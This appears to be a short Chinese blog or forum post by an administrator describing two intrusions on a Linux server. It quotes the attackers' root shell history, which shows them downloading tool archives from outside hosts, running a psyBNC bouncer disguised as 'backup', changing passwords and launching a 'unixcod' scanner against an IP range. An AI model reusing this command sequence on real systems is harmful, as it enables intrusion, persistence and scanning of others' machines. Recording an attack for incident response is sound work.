第一次查到来源IP说是广西的，第二次是美国。

第一次把系统弄的彻底起不来，第二次把所有用户密码都改掉了...

幸好，还有一个会话从昨晚持续到现在，是root登录的，history查看到他们的动作：

576  wget nasuc.d.am/scan/neW.jpg
  577  wget nasuc.do.am/scan/neW.jpg
  578  ftp 208.100.61.2
  579  ssh
  580  ls
  581  tar xzvf
  582  ccd /tmp
  583  ls
  584  cd /tmp
  585  ls
  586  tar xzvf belea.tgz
  587  w
  588  ls
  589  ls
  590  cat /proc/cpuinfo
  591  w
  592  ls
  593  passwd
  594  wget
  595  wget ideo.go.ro/psy6667.tgz
  596  cd
  597  w
  598  ls
  599  w
  600  uname -a
  601  tar xzvf psy6667.tgz
  602  cd psybnc
  603  chmod +x psybnc
  604  mv psybnc backup
  605  ./backup
  606  cd
  607  ls
  608  cat /p[roc/cpuinfo
  609  cat /proc/cpuinfo
  610  cd
  611  cd
  612  ls
  613   tar xzvf unixcod.tar.gz
  614  cd unixcod
  615  ./unix 218.249


唉，这些人，在搞什么呢？